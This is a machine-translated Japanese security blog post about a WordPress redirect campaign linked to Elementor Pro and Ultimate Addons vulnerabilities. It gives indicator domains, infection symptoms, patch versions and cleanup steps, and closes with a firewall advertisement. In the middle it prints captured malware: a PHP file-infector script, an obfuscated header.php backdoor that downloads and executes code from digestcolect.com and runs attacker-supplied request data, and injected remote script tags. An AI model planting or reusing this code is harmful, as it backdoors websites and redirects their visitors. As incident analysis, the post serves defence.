WordPress ウェブサイトの Digestcolect .com への標的型リダイレクト攻撃 - Elementor Pro の脆弱性にリンク

WordPress のテーマやプラグインの脆弱性を狙った攻撃は、ここ数か月で激化しています。すでに進行中の WordPress プラグインに対する攻撃キャンペーン – Elementor Pro、Elementor &Astra Theme の Ultimate Addons は、ユーザーを疑わしい Web サイトにリダイレクトするリダイレクト ハッキング キャンペーンによって新たな方向に進んでいるようです

• digestcolect [.] com,
• js[.]donatelloflowfirstly.ga、
• track[.]developfirstline[.]com/t.js?s=5,
• deliverynotforme[.]最高、
• 0.beerockstars[.]ga/?p=me3gmnbugm5gi3bpgq3tknq&sub2=mtrolley83,
• 0.directedmyfounds[.]ga/?p=gi3tazrwga5gi3bpgizdgmq&sub2=mstimens3,
• well.linetoadsactive[.]com/m.js?n=nb5,
• 0.realhelpcompany[.]が、
• fast.helpmart[.]ga/m[.]js?w=085,
• dock.lovegreenpencils[.]ga/m.js?n=nb5,
• cht.secondaryinformtrand[.]com/m.js?n=nb5,
• main.travelfornamewalking[.]ga/,
• irc.lovegreenpencils[.]ga/など

Elementor と Elementor 用の Ultimate アドオンの両方が、これらのセキュリティ問題にパッチを当てるための更新を発行しました。まだ行っていない場合は、次のバージョンに更新してください:

• Elementor Pro: 2.9.4
• Elementor の究極のアドオン: 1.24.2

関連ハック – また、WordPress Web サイトがトラッキングにリダイレクトされることも確認しています。 developmentfirstline[.com]/t.js?s=5′ type='text/javascript

これまでに分かっていること…

影響を受ける Web サイトで見られる一般的な症状の 1 つに、リダイレクトがあります。

とはいえ、攻撃を示唆する他の症状もあります:

<オール>

ウェブサイトのルート ディレクトリに追加された意味不明なファイル

WordPress 管理エリアに追加された認証されていない管理ユーザー

/wp-content/uploads/elementor/custom-icons/ 内の不明なファイルとフォルダー

wp-xmlrpc.phpwp-cl-plugin.php などの Web サイトのルートにある不明なファイル

何千もの未知の悪意のある JavaScript ファイルと PHP ファイルがファイル システムに追加されました

悪意のある 'tap.digestcolect.com/r. php?id=0 spam/' ウェブサイトのリダイレクト コードは次のようになりますか?

• 次のコードは、「hjghjerg」という名前のファイルの下で見つかりました ':

<?php $lastRunLog = "./debugs.log";
if (file_exists($lastRunLog)) {
 $lastRun = file_get_contents($lastRunLog);
 if (time() - $lastRun >= 6400) {
 search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index");
 search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
 file_put_contents($lastRunLog, time());
 }
} else {
 search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index");
 search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
 file_put_contents( './debugs.log', time());
}
function search_file($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {
 $dir = substr($dir, 0, -3);
 if (strpos($dir, '../') !== false) {
 @search_file( $dir,"index");
 return;
 }
 if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
 @search_file( $dir,"index");
 return;
 }
}

...

function search_file_js($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {
 $dir = substr($dir, 0, -3);
 if (strpos($dir, '../') !== false) {
 @search_file_js( $dir,".js");
 return;
 }
 if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
 @search_file_js( $dir,".js");
 return;
 }
}
foreach($files as $key => $value){
 $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
 if(!is_dir($path)) {
 if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
 make_it_js($path);
 } }else if($value != "." && $value != "..") {
 search_file_js($path, $file_to_search);
 } 
 } 
}
function make_it_js($f){
 $g = file_get_contents($f);
 if (strpos($g, 'var') !== false) {
 $g = file_get_contents($f);
if (strpos($g, 'mndfhghjf') !== false) {
} else {
$l2 = "";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, 'mndfhghjf') !== false) {
} 
}
 }
}
function make_it($f){
$g = file_get_contents($f);
if (strpos($g, 'trackstatisticsss') !== false) {
} else {
$l2 = "";
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, 'trackstatisticsss') !== false) {
} 
 }
}

• このコードは、ファイル header.php 内で見つかりました:

<?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; 
$d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); 
$b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(99).chr(115).chr(115).chr(46).chr(100).chr(105).chr(103).chr(101).chr(115).chr(116).chr(99).chr(111).chr(108).chr(101).chr(99).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(109).chr(46).chr(116).chr(120).chr(116)));
$c1 = chr(104);
 @file_put_contents($c1,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($c1);@unlink($c1); ?><?php if(isset($_REQUEST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_REQUEST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).

..

chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; $z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32); $z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]); $z3 = $b2($_REQUEST[chr(100).chr(49)]); @$n3($a,$z2); @include($a);@unlink($a); $a = chr(47).chr(116).chr(109).chr(112).chr(47).$a; @$n3($a,$z2); @include($a);@unlink($a);die(); } ?><?php if(isset($_GET[5]) && md5($_GET[5]) == "37147ec1ab66861d6e2ef8f672cb2c0b") {function _1896550334($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*","");return $a[$i];} function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];if(3404<mt_rand(443,2956))session_get_cookie_params($_COOKIE,$_0,$_POST,$_0);}$_1=l__0(_1896550334(0)) .l__0(_1896550334(1)) .l__0(_1896550334(2)) .l__0(_1896550334(3));if(!empty($_1)){$_1=str_rot13(@pack(_1896550334(4),strrev($_1)));if(isset($_1)){$_2=create_function(_1896550334(5),$_1);$_2();exit();}}else{echo base64_decode("bG9jYWwtZXJyb3Itbm90LWZvdW5k");}die();} ?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>

• このコードはいくつかのコア テーマ ファイルで見つかりました:

<script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script>

Digestcolect [.] com リダイレクトを修正する方法

Web サイトがリダイレクトされたり、ハッキングの他の兆候が見られたりする場合は、次の手順を実行してインシデントへの対応を早めることができます:

<オール>

functions.php、wp-config.php、index.php など、ハッカーを引き付けるお気に入りのファイルをチェックすることから始めます

WordPress のコア ファイルとサーバー上のファイルを比較して、ハッカーがコア ファイルに感染した可能性があるかどうかを確認します

オンライン マルウェア スキャナでウェブサイトをスキャンします。

なじみのない管理者やユーザーがデータベースにいないか確認する

意味不明なファイルがないかルート ディレクトリを確認してください

WordPress リダイレクトの削除ガイドに従ってください より完全なマルウェアの除去については、このステップバイステップのチュートリアルに従ってください。

リダイレクトが引き続き発生する場合は、ハッカーが Web サイトにバックドアを挿入した可能性も十分にあります。これには通常、ウェブサイトをクリーンアップするためのコード レビューを含む詳細なマルウェア スキャンが必要です。

またチェックアウト:ステップバイステップの WordPress マルウェア削除ガイド

感染していませんか?ウェブサイトを保護

エクスプロイトを回避できて幸運でした。しかし、チャンスに賭けてはいけません。今すぐウェブサイトを保護することをお勧めします。 Astra Security のようなプレミアム ファイアウォールは、24 時間 365 日監視し、JS インジェクション、SQLi、CSRF、XSS、Bad Bot、RFI、LFI などの攻撃から保護することで、Web サイトを保護するのに大いに役立ちます。

Malware Scanner、Country Blocking、IP Blocking、Astra security などの追加のセキュリティ ツールが多数あり、企業やブログにとって簡単です。